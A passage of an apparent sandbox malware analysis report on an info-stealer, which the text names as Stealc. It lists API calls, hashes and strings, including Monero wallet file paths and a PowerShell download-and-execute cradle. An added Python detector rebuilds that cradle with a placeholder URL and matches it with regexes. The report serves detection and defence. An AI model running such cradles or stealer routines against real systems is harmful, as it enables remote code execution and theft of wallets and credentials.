                                          • Part of subcall function 00924570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00924580
                                          • Part of subcall function 00924570: RtlAllocateHeap.NTDLL(00000000), ref: 00924587
                                          • Part of subcall function 00924570: wsprintfA.USER32 ref: 009245A6
                                          • Part of subcall function 00924570: FindFirstFileA.KERNEL32(?,?), ref: 009245BD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                         • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                        • String ID: Xk
                                        • API String ID: 2540262943-89453425
                                        • Opcode ID: 79b0a7453b63971a9d6a4fc7ae654dc107a95cd6c848a88c932befcc1f59909d
                                        • Instruction ID: 556a604226cd32ac3f0389388ee588e2261b9808b88ebf299b21e6c45a806e22
                                        • Opcode Fuzzy Hash: 79b0a7453b63971a9d6a4fc7ae654dc107a95cd6c848a88c932befcc1f59909d
                                        • Instruction Fuzzy Hash: D83153B690031867CB10F7B0EC85FEE737CAB98700F404989B355A6095EEB4A7C98B95
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00914FCA
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00914FD1
                                        • InternetOpenA.WININET(00930DDF,00000000,00000000,00000000,00000000), ref: 00914FEA
                                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00915011
                                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00915041
                                        • InternetCloseHandle.WININET(?), ref: 009150B9
                                        • InternetCloseHandle.WININET(?), ref: 009150C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                         • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                        • String ID:
                                        • API String ID: 3066467675-0
                                        • Opcode ID: 2e54e49c35aa63557f972693322560a751f8571213cc94c43b6e6bfc47895ec0
                                        • Instruction ID: c457839a0055d04b3e07c23f0b3590f04640912a1f8386b4d42d165e487f37ff
                                        • Opcode Fuzzy Hash: 2e54e49c35aa63557f972693322560a751f8571213cc94c43b6e6bfc47895ec0
                                        • Instruction Fuzzy Hash: 4A31E6B4A00218EBDB20CF94DC85BDDB7B4EB48705F5081D9EA09B7281DB746EC58F99
                                        APIs
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00928426
                                        • wsprintfA.USER32 ref: 00928459
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0092847B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0092848C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00928499
                                          • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                                        • RegQueryValueExA.ADVAPI32(00000000,006BE098,00000000,000F003F,?,00000400), ref: 009284EC
                                        • lstrlen.KERNEL32(?), ref: 00928501
                                        • RegQueryValueExA.ADVAPI32(00000000,006BE140,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00930B34), ref: 00928599
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00928608
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0092861A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                         • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                        • String ID: %s\%s
                                        • API String ID: 3896182533-4073750446
                                        • Opcode ID: 25e6de623eede54569204b696e3ac1bdb3cfc7f6ceb08771526e826b8f368cef
                                        • Instruction ID: 2bc31df3598b4c3253c38e3aec46fc34f3a3242664f43d265291cac188a6283e
                                        • Opcode Fuzzy Hash: 25e6de623eede54569204b696e3ac1bdb3cfc7f6ceb08771526e826b8f368cef
                                        • Instruction Fuzzy Hash: 7721F6B1910228ABDB24DB54DC85FE9B7B8FB48701F0086D8E609A6180DE716A85CF94
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009276A4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 009276AB
                                        • RegOpenKeyExA.ADVAPI32(80000002,006ABFA0,00000000,00020119,00000000), ref: 009276DD
                                        • RegQueryValueExA.ADVAPI32(00000000,006BDFC0,00000000,00000000,?,000000FF), ref: 009276FE
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00927708
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                         • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: Windows 11
                                        • API String ID: 3225020163-2517555085
                                        • Opcode ID: 760ce3c3c43105e33fb521fa81fc5bc713520a8a366f1ab323c91731ea62e6bc
                                        • Instruction ID: 295b56314a6c16f230fac185b47ee8f7867d1285545750b30fd361e040042740
                                        • Opcode Fuzzy Hash: 760ce3c3c43105e33fb521fa81fc5bc713520a8a366f1ab323c91731ea62e6bc
                                        • Instruction Fuzzy Hash: B5014FB5A04308BFDB00DBE4EC59F6DB7BCEB48702F104594FA04B7294EA7499048F51
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00927734
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0092773B
                                        • RegOpenKeyExA.ADVAPI32(80000002,006ABFA0,00000000,00020119,009276B9), ref: 0092775B
                                        • RegQueryValueExA.ADVAPI32(009276B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0092777A
                                        • RegCloseKey.ADVAPI32(009276B9), ref: 00927784
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                         • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: CurrentBuildNumber
                                        • API String ID: 3225020163-1022791448
                                        • Opcode ID: c2fc9a4bb455959c46b05355c665d1d35bccdf1c9382bcbf6219c8147798063e
                                        • Instruction ID: 64b37819ded1e9115482bbd54286d34381d3acfc3e876cb881c505ce9a7ed216
                                        • Opcode Fuzzy Hash: c2fc9a4bb455959c46b05355c665d1d35bccdf1c9382bcbf6219c8147798063e
                                        • Instruction Fuzzy Hash: 0601F4B5A40308BFD700DBE4DC49FAEB7B8EB48705F104695FA05B7281DA7059408F51
                                        APIs
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009199EC
                                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00919A11
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00919A31
                                        • ReadFile.KERNEL32(000000FF,?,00000000,0091148F,00000000), ref: 00919A5A
                                        • LocalFree.KERNEL32(0091148F), ref: 00919A90
                                        • CloseHandle.KERNEL32(000000FF), ref: 00919A9A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                         • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                        • String ID:
                                        • API String ID: 2311089104-0
                                        • Opcode ID: 9f94b449426ccb0d70c7fe8dd0f5833ef47ff40275afc434ef870bf2c4261fd1
                                        • Instruction ID: ecb4b1cbc255769e876f2461688dc3d8e438ef5d75e75d7664faa234bd991594
                                        • Opcode Fuzzy Hash: 9f94b449426ccb0d70c7fe8dd0f5833ef47ff40275afc434ef870bf2c4261fd1
                                        • Instruction Fuzzy Hash: 17312A74A00209EFDB14CF94D895BEE77B9FF48301F108198E901A7290DB75A985CFA1
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00922D85
                                        Strings
                                        • <, xrefs: 00922D39
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00922D04
                                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00922CC4
                                        • ')", xrefs: 00922CB3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                         • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        • API String ID: 3031569214-898575020
                                        • Opcode ID: d7062f5a0cac7100957e7d69f9f7e42a8ff99cf32b7494a2dba4909ec0f52dd7
                                        • Instruction ID: e3063e2e6445b9f8fc2df18137ebdfa8332d8efe927bf819dca40c9bbb6b9939
                                        • Opcode Fuzzy Hash: d7062f5a0cac7100957e7d69f9f7e42a8ff99cf32b7494a2dba4909ec0f52dd7
                                        • Instruction Fuzzy Hash: D641DF72D102189BDB14FFA0E892BDDB778AF94300F404159F006A7199DF746A4ACF95
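The function above is the "Powershell download and execute" behaviour flagged in the signature list: it concatenates the SysWOW64 powershell.exe path (00922D04), the argument prefix `-nop -c "iex(New-Object Net.WebClient).DownloadString('` (00922CC4) and the suffix `')"` (00922CB3), with the download URL inserted between them at run time, and hands the result to ShellExecuteEx. The detection logic below is an added example for this report, not code from the sample or from Joe Sandbox: it rebuilds the command line as it would appear in process-creation telemetry (quoting of the image path is assumed), then scores constructed Sysmon-style events for the cradle. It generalises past the exact string in the listing to the `Invoke-Expression` spelling, the `System.Net.WebClient` form and the sibling `DownloadData`/`DownloadFile` methods; all event records and URLs are made up.

```python
"""Detection for the PowerShell download cradle assembled at 00922CB3-00922D04.

Added example for this report; not code from the sample, from Stealc, or from
Joe Sandbox. The event records and URLs are constructed for the demo.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# The three string fragments from the listing above; the download URL is
# whatever the sample inserts between prefix and suffix at run time.
PS_WOW64 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
CRADLE_PREFIX = "-nop -c \"iex(New-Object Net.WebClient).DownloadString('"
CRADLE_SUFFIX = "')\""


def build_cradle(url: str) -> str:
    """Command line as it would show in process-creation telemetry (quoting assumed)."""
    return f'"{PS_WOW64}" {CRADLE_PREFIX}{url}{CRADLE_SUFFIX}'


# Constructed process-creation events (hypothetical; not from the report).
SAMPLE_EVENTS = [
    {"pid": 4312, "parent_image": r"C:\Users\user\Desktop\file.exe",
     "image": PS_WOW64,
     "cmdline": build_cradle("http://example.invalid/stage2.ps1")},
    {"pid": 5120, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -NoProfile -Command "Get-ChildItem C:\\Temp"'},
    {"pid": 6001, "parent_image": r"C:\Program Files\App\updater.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": ("powershell -NoP -W Hidden -Command \"Invoke-Expression "
                 "(New-Object System.Net.WebClient).DownloadString('https://example.invalid/a')\"")},
]

# Matches the cradle and its common spelling variants (alias vs. full cmdlet,
# with or without the System. prefix, other WebClient download methods).
IEX_RE = re.compile(r"(?<![\w-])(iex|invoke-expression)(?![\w-])", re.I)
DOWNLOAD_RE = re.compile(
    r"Net\.WebClient\s*\)?\s*\.\s*Download(String|Data|File)\s*\(\s*['\"]([^'\"]*)['\"]", re.I)
NOPROFILE_RE = re.compile(r"(?:^|\s)-nop[a-z]*(?=\s|$)", re.I)      # -nop ... -NoProfile
HIDDEN_RE = re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+hidden\b", re.I)


@dataclass
class Finding:
    pid: int
    indicators: List[str] = field(default_factory=list)
    url: Optional[str] = None

    @property
    def severity(self) -> str:
        if "iex_download_cradle" in self.indicators:
            return "high"
        if "webclient_download" in self.indicators:
            return "medium"
        return "low" if self.indicators else "none"


def analyze(event: dict) -> Finding:
    """Score one process-creation event."""
    cmd = event["cmdline"]
    finding = Finding(pid=event["pid"])
    download = DOWNLOAD_RE.search(cmd)
    if download:
        finding.url = download.group(2)
        # A download fed straight into iex is the execute-in-memory cradle.
        finding.indicators.append(
            "iex_download_cradle" if IEX_RE.search(cmd) else "webclient_download")
    if NOPROFILE_RE.search(cmd):
        finding.indicators.append("noprofile")
    if HIDDEN_RE.search(cmd):
        finding.indicators.append("hidden_window")
    if "\\syswow64\\" in event["image"].lower():
        # 32-bit PowerShell on a 64-bit host: what a 32-bit dropper like this sample launches.
        finding.indicators.append("wow64_powershell")
    return finding


def scan(events: List[dict]) -> List[Finding]:
    """Return only the findings worth an alert."""
    return [f for f in (analyze(e) for e in events) if f.severity in ("high", "medium")]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f.pid, f.severity, f.url, f.indicators)
```

The URL captured by `DOWNLOAD_RE` is the second-stage host and belongs in the same alert as the process tree; the `wow64_powershell` indicator on its own is weak (32-bit admin tooling exists), so it only adds context to a cradle hit rather than raising severity by itself.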
                                        APIs
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00919F41
                                          • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                         • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$AllocLocal
                                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                        • API String ID: 4171519190-1096346117
                                        • Opcode ID: 7d414f1ec727524cd4eb585a64fc33bfbf8603cb7bf6b7046a034eb75175116e
                                        • Instruction ID: 191a89a96cfd2b6a75bd85e629b8f9e5d5156aed3aaeb65db7c7a5f3b3c9bb4a
                                        • Opcode Fuzzy Hash: 7d414f1ec727524cd4eb585a64fc33bfbf8603cb7bf6b7046a034eb75175116e
                                        • Instruction Fuzzy Hash: F3616D71A0021CAFDB24EFA4DC96FEE7779AF85304F408018F90A9B195EB746A45CB52
                                        APIs
                                        • GetSystemTime.KERNEL32(?), ref: 0092696C
                                        • sscanf.NTDLL ref: 00926999
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009269B2
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009269C0
                                        • ExitProcess.KERNEL32 ref: 009269DA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                         • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Time$System$File$ExitProcesssscanf
                                        • String ID:
                                        • API String ID: 2533653975-0
                                        • Opcode ID: 28dc1efa294c6e49fefd70e4a3eaf5a3ad44d50c697bde337823baee55a7177c
